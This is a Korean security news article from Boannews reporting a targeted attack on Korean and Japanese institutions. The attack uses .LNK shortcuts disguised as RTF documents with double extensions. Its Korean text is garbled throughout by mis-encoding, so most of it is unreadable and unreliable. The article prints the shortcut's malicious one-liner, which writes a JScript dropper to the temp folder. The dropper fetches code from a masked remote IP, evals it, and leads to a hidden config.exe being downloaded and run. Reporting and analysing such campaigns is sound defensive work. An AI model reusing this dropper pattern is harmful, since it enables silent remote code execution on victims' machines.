À̸ÞÀÏ¿¡ ÷ºÎÇØ À¯Æ÷...Àǽɽº·¯¿î ¸ÞÀÏÀÇ Ã·ºÎÆÄÀÏÀº ¿Áö ¸»¾Æ¾ß
[º¸¾È´º½º ±Ç ÁØ] ÃÖ±Ù ÀϺ»°ú Çѱ¹ÀÇ Æ¯Á¤±â°üµéÀ» ³ë¸° Àº¹ÐÇÑ ¹æ½ÄÀÇ Áö´ÉÇü Ç¥Àû°ø°ÝÀÌ ÁøÇàÇÏ°í ÀÖ´Â °ÍÀ¸·Î ¾Ë·ÁÁ® ÁÖÀÇ°¡ ¿ä±¸µÈ´Ù.
¡ã ¡®ÇÊ¿äÇÑ ÀÚ·á.rtf.zip¡¯ ÆÄÀϸíÀ¸·Î À¯Æ÷µÈ ¹Ù·Î°¡±â(.LNK) ÆÄÀÏÇü½ÄÀ» °¡ÀåÇÑ Áö´ÉÇüÇ¥Àû °ø°Ý ¿¹ [ÀÚ·á : À×Ä«ÀÎÅÍ³Ý ´ëÀÀÆÀ]
Áö³ 7¿ù Áß¼ø°æºÎÅÍ 8¿ùÃʱîÁö ÀϺ»°ú Çѱ¹ÀÇ Æ¯Á¤±â°üµéÀ» Ÿ±êÀ¸·Î ¹Ù·Î°¡±â(.LNK) ÆÄÀÏÇü½ÄÀ» °¡ÀåÇÑ Áö´ÉÇü Ç¥Àû°ø°Ý Á¤È²À» Æ÷ÂøÇß´Ù°í À×Ä«ÀÎÅÍ³Ý ´ëÀÀÆÀ ÃøÀº ¹àÇû´Ù.
ÀÌ °ø°Ý¹æ½ÄÀº ¹Ù·Î°¡±â(.LNK) ÆÄÀÏÇü½ÄÀ¸·Î ¸¸µé¾îÁ® ÀÖ°í, .LNK ³»ºÎ¿¡ »ðÀÔµÈ ¾ÇÀÇÀû ½ºÅ©¸³Æ® ÄÚµå ¸í·É¿¡ ÀÇÇØ Æ¯Á¤ »çÀÌÆ®·Î ¿¬°áµÇ´Â °ÍÀ¸·Î µå·¯³µ´Ù. ÀÌ °úÁ¤¿¡¼ ÀÌ¿ëÀÚ ¸ô·¡ EXE ¾Ç¼ºÆÄÀÏÀ» Ãß°¡·Î ´Ù¿î·ÎµåÇÏ¿© ¸ô·¡ ½ÇÇàÇÏ´Â ÀÏÁ¾ÀÇ ¿ø°Ý½ÇÇà Ãë¾àÁ¡ÀÌ ÀÛµ¿ÇÏ°Ô µÇ´Â °ÍÀ¸·Î ºÐ¼®µÆ´Ù.
¶ÇÇÑ, °ø°ÝÀÚµéÀº ¹Ù·Î°¡±â ÆÄÀÏÀÌ ¸¶Ä¡ ¹®¼ÆÄÀÏó·³ º¸À̵µ·Ï Çϱâ À§Çؼ ¾ÆÀÌÄÜÀ» ¿öµåÆеå(RTF)·Î À§ÀåÇϰųª ½ÇÁ¦ °¡Â¥ ¹®¼È¸éÀ» ½ÇÇàÇÏ¿© ÀÌ¿ëÀÚ·Î ÇÏ¿©±Ý Á¤»óÀûÀÎ ¹®¼ÆÄÀÏ·Î ÀÎÁöÇϵµ·Ï ÇöȤÇÏ´Â °ÍÀ¸·Î ¾Ë·ÁÁ³´Ù.
ÀÌ·¯ÇÑ °ø°ÝÀÌ ÁøÇàµÈ »ç·Ê °¡¿îµ¥ Çϳª·Î ÃÖ±Ù ¡®ÇÊ¿äÇÑ ÀÚ·á.rtf.zip¡¯ ÆÄÀϸíÀ¸·Î À¯Æ÷µÈ °æ¿ì°¡ ÀÖ´Ù. ÀÌ ÆÄÀÏ¿¡´Â ³»ºÎ¿¡ ¡®ÇÊ¿äÇÑ ÀÚ·á.rtf.lnk¡¯ À̸§ÀÇ ¾Ç¼ºÆÄÀÏÀÌ Æ÷ÇԵǾî ÀÖ°í, ¹®¼ÆÄÀÏó·³ º¸À̵µ·Ï Çϱâ À§Çؼ 2Áß È®ÀåÀÚ·Î ¸¸µé¾îÁ® ÀÖ´Â °ÍÀ¸·Î ¾Ë·ÁÁ³´Ù. ¾ÐÃàÀ» ÇØÁ¦ÇÏ¸é ´ÙÀ½°ú °°ÀÌ LNK È®Àå¸íÀº º¸¿©ÁöÁö ¾Ê°í, RTF ¹®¼Æ÷¸Ëó·³ º¸¿©Áö´Â °ÍÀÌ´Ù.
¡®ÇÊ¿äÇÑ ÀÚ·á.rtf.lnk¡¯ ÆÄÀÏÀº ³»ºÎÀûÀ¸·Î ¹Ù·Î°¡±â ´ë»ó ³»¿ë¿¡ ¾ÇÀÇÀûÀÎ ½ºÅ©¸³Æ® Äڵ带 Æ÷ÇÔÇØ µÎ¾ú±â ¶§¹®¿¡ ƯÁ¤ »çÀÌÆ®·Î ¿¬°áµÇ¾î Ãß°¡ÀûÀÎ ½ºÅ©¸³Æ® ¸í·É¾î°¡ ½ÇÇàµÇµµ·Ï ÇÏ¸ç ¸í·É¾î´Â ÀÓ½ÃÆú´õ(Temp)¿¡ ¡®u.js¡¯ ¶ó´Â À̸§À¸·Î »ý¼ºµÇ°í ½ÇÇàµÈ´Ù.
%ComSpec% "/c echo try{x=new ActiveXObject("MSXML2.XMLHTTP");x.Open("GET","http://***.***.**.**/js?k=**********************************",0);x.Send();eval(x.responseText);}catch(e){;}>%tmp%\u.js&%tmp%\u.js"
Ãß°¡·Î Á¢¼ÓµÇ´Â »çÀÌÆ®¿¡´Â ¶Ç ´Ù½Ã ½ºÅ©¸³Æ® ¸í·ÉÀÌ ÀÛµ¿µÇµµ·Ï ¸¸µé¾îÁ® ÀÖ°í, ÀÌ ÆÄÀÏÀº 10Áø¼ö Äڵ尪À¸·Î ¾ÏȣȵǾî ÀÖÀ¸³ª ½ÇÁ¦·Î ASCII Äڵ尪À¸·Î º¯È¯µÇ¸é ƯÁ¤ »çÀÌÆ®¿¡¼ ¡®application.rtf¡¯ ÆÄÀÏ°ú ¡®config.exe¡¯ ÆÄÀÏÀ» ´Ù¿î·ÎµåÇÏ°í ½ÇÇàÇÏ´Â ¸í·É¾î¶ó´Â Á¡À» ¾Ë ¼ö ÀÖ´Ù´Â °Ô À×Ä«ÀÎÅÍ³Ý ´ëÀÀÆÀ ÃøÀÇ ¼³¸íÀÌ´Ù.
´õ¿íÀÌ Á¤»óÀûÀÎ ¹®¼ÆÄÀÏÀÌ ½ÇÇàµÈ °Íó·³ º¸À̵µ·Ï Çϱâ À§Çؼ ´Ù¿î·ÎµåÇÑ Á¤»óÀûÀÎ ¡®application.rtf¡¯ ¹®¼ ÆÄÀÏÀ» ½ÇÇàÇÏ¿© º¸¿©ÁØ´Ù. ÇÏÁö¸¸ »ç¿ëÀÚ ÄÄÇ»ÅÍ¿¡´Â ¡®config.exe¡¯ ¶ó´Â ¾Ç¼ºÆÄÀÏÀÌ ÀÌ¿ëÀÚ ¸ô·¡ ´Ù¿î·ÎµåµÇ°í ½ÇÇàµÈ´Ù.
ÀÌ ¿Ü¿¡µµ Çѱ¹°ú ÀϺ»ÀÇ Æ¯Á¤±â°üÀ» Ÿ±êÀ¸·Î ÀÌ¿Í À¯»çÇÑ ¾Ç¼ºÆÄÀÏÀ» À¯Æ÷ÇÑ »ç·Ê°¡ ´Ù¼ö Æ÷ÂøµÈ °ÍÀ¸·Î ¾Ë·ÁÁ³´Ù.
ÀÌ¿Í °ü·Ã À×Ä«ÀÎÅÍ³Ý ´ëÀÀÆÀ ¹®Á¾Çö ÆÀÀåÀº ¡°ÇöÀç±îÁö Çѱ¹°ú ÀϺ»À» »ó´ë·Î ÇÑ °ø°Ý ¡ÈÄ°¡ °è¼Ó ¹ß°ßµÇ°í ÀÖ´Â »óÅÂÀÌ°í, ´ëºÎºÐ ¹Ù·Î°¡±â ÆÄÀÏÀ» ZIP µîÀ¸·Î ¾ÐÃàÇÏ¿© À̸ÞÀÏ¿¡ ÷ºÎÇÏ´Â À¯Æ÷±â¹ýÀ» ÀÌ¿ëÇÏ°í ÀÖ´Ù¡±¸ç, ¡°½ÇÁ¦ ¹®¼ÆÄÀÏÀÇ Ãë¾àÁ¡ °ø°ÝÀº ¾Æ´Ï±â ¶§¹®¿¡ ±âÁ¸ÀÇ ¹®¼±â¹Ý ¾Ç¼ºÆÄÀÏ Å½ÁöÁ¤Ã¥À» ¿ìȸÇϰųª ȸÇÇÇϱâ À§ÇÑ ¿ëµµ·Î ±³¹¦ÇÏ°Ô ÀÌ¿ëµÇ°í ÀÖ¾î °¢º°ÇÑ ÁÖÀÇ°¡ ¿ä±¸µÈ´Ù¡±°í ¹àÇû´Ù.
µ¡ºÙ¿© ±×´Â ¡°¹Ù·Î°¡±â Ãë¾àÁ¡À» ÀÌ¿ëÇؼ ¸¶Ä¡ ¹®¼ÆÄÀÏó·³ À§ÀåÇÑ ¾Ç¼ºÆÄÀÏÀÌ Áõ°¡ÇÏ°í ÀÖ°í, º¯Á¾ ¾Ç¼ºÆÄÀÏÀÌ ´Ù¼ö ÀüÆĵǰí ÀÖ¾î ¿î¿µÃ¼Á¦¿Í °¢Á¾ ÀÀ¿ëÇÁ·Î±×·¥Àº Ç׽à ÃֽŹöÀüÀ¸·Î À¯ÁöÇÏ°í ±âº»ÀûÀÎ º¸¾È¼öÄ¢ Áؼö°¡ ÇÊ¿äÇÏ´Ù¡±¸ç, ¡°ÀÌ¿Í ÇÔ²² Àǽɽº·¯¿î À̸ÞÀÏÀÇ Ã·ºÎÆÄÀÏÀº °¡±ÞÀû ¿¶÷ÇÏÁö ¾Êµµ·Ï ÇØ¾ß ÇÑ´Ù¡±°í ´çºÎÇß´Ù.
ÇØ´ç ¾Ç¼ºÆÄÀÏÀº ¾ÆÁ÷±îÁö Àü ¼¼°è ´ëºÎºÐÀÇ º¸¾ÈÁ¦Ç°µéÀÌ Å½ÁöÇÏÁö ¸øÇÏ°í ÀÖ´Â ½ÇÁ¤À¸·Î, À×Ä«ÀÎÅÍ³Ý ´ëÀÀÆÀÀº ¾Ç¼ºÆÄÀÏ º¯Á¾µéÀ» ´Ù¼ö È®º¸ÇÏ¿© ±ä±Þ ¾÷µ¥ÀÌÆ®¸¦ ¿Ï·áÇÑ »óŶó°í ¼³¸íÇß´Ù.
[±Ç ÁØ ±âÀÚ(editor@boannews.com)]
<ÀúÀÛ±ÇÀÚ: º¸¾È´º½º(http://www.boannews.com/) ¹«´ÜÀüÀç-Àç¹èÆ÷±ÝÁö>